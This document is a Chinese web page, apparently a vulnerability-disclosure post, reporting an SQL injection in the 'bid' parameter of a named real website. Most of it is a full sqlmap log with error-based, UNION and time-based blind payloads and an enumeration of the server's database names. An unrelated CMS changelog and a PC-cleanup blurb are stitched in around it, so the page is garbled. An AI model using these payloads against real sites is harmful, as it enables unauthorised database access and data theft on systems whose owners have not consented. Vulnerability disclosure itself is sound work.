我拉网主站一处sql注入
注入点
新版本程序更新主要体现在:完美整合BBS论坛程序,用户只须注册一个帐号,即可全站通用!采用目前流行的Flash滚动切换广告 变换形式多样,受人喜爱!在原有提供的5种在线支付基础上增加北京云网支付!对留言本重新进行编排,加入留言验证码,后台有留言审核开关对购物系统的前台进行了一处安全更新。在原有文字友情链接基础上,增加LOGO友情链接功能强大的6种在线支付方式可选,自由切换。对新闻列表进行了调整,
0
http://www.55.la/run/ding_banner.php?bid=21022
注入地址:http://www.55.la/run/ding_banner.php?bid=21022<br /><br /> sqlmap/1.0-dev - automatic SQL injection and database takeover tool<br /> http://www.sqlmap.org<br /><br />[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual<br /> consent is illegal. It is the end user's responsibility to obey all applicable<br />local, state and federal laws. Authors assume no liability and are not responsib<br />le for any misuse or damage caused by this program<br /><br />[*] starting at 02:04:07<br /><br />[02:04:07] [INFO] using 'C:/Users/Administrator/Desktop/渗透工具/sqlmap GUI汉化<br />版/rar/output/www.55.la/session' as session file<br />[02:04:07] [INFO] testing connection to the target url<br />[02:04:07] [INFO] testing if the url is stable, wait a few seconds<br />[02:04:08] [INFO] url is stable<br />[02:04:08] [INFO] testing if GET parameter 'bid' is dynamic<br />[02:04:09] [INFO] confirming that GET parameter 'bid' is dynamic<br />[02:04:09] [INFO] GET parameter 'bid' is dynamic<br />[02:04:09] [INFO] heuristic test shows that GET parameter 'bid' might be injecta<br />ble (possible DBMS: MySQL)<br />[02:04:09] [INFO] testing sql injection on GET parameter 'bid'<br />[02:04:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'<br />[02:04:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br />'<br />[02:04:11] [INFO] GET parameter 'bid' is 'MySQL >= 5.0 AND error-based - WHERE o<br />r HAVING clause' injectable<br />[02:04:11] [INFO] testing 'MySQL > 5.0.11 stacked queries'<br />[02:04:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'<br />[02:04:21] [INFO] GET parameter 'bid' is 'MySQL > 5.0.11 AND time-based blind' i<br />njectable<br />[02:04:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'<br />[02:04:24] [INFO] target url appears to be UNION injectable with 1 columns<br />[02:04:25] [INFO] GET parameter 'bid' is 'MySQL UNION query (NULL) - 1 to 10 col<br />umns' injectable<br />GET parameter 'bid' is vulnerable. Do you want to keep testing the others (if an<br />y)? [y/N] y<br />sqlmap identified the following injection points with a total of 32 HTTP(s) requ<br />ests:<br />---<br />Place: GET<br />Parameter: bid<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: bid=21022' AND (SELECT 3637 FROM(SELECT COUNT(*),CONCAT(0x3a6f636a3<br />a,(SELECT (CASE WHEN (3637=3637) THEN 1 ELSE 0 END)),0x3a7862753a,FLOOR(RAND(0)*<br />2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'uYVe'='uYVe<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 1 column<br /> Payload: bid=-1700' UNION SELECT CONCAT(0x3a6f636a3a,0x676e4261505364745265,<br />0x3a7862753a)# AND 'EXgA'='EXgA<br /><br /> Type: AND/OR time-based blind<br /> Title: MySQL > 5.0.11 AND time-based blind<br /> Payload: bid=21022' AND SLEEP(5) AND 'xros'='xros<br />---<br /><br />[02:04:27] [INFO] the back-end DBMS is MySQL<br /><br />web application technology: Nginx, PHP 5.3.24<br />back-end DBMS: MySQL 5.0<br />[02:04:27] [INFO] fetching database names<br />[02:04:30] [INFO] the SQL query used returns 5 entries<br />[02:04:30] [INFO] retrieved: "information_schema"<br />[02:04:37] [INFO] retrieved: "help55la"<br />[02:04:37] [INFO] retrieved: "test"<br />[02:04:37] [INFO] retrieved: "u_run55_la"<br />[02:04:37] [INFO] retrieved: "wstp8_com"<br />available databases [5]:<br />[*] help55la<br />[*] information_schema<br />[*] test<br />[*] u_run55_la<br />[*] wstp8_com<br /><br />[02:04:37] [INFO] Fetched data logged to text files under 'C:/Users/Administrato<br />r/Desktop/渗透工具/sqlmap GUI汉化版/rar/output/www.55.la'<br /><br />[*] shutting down at 02:04:37
每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。
Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号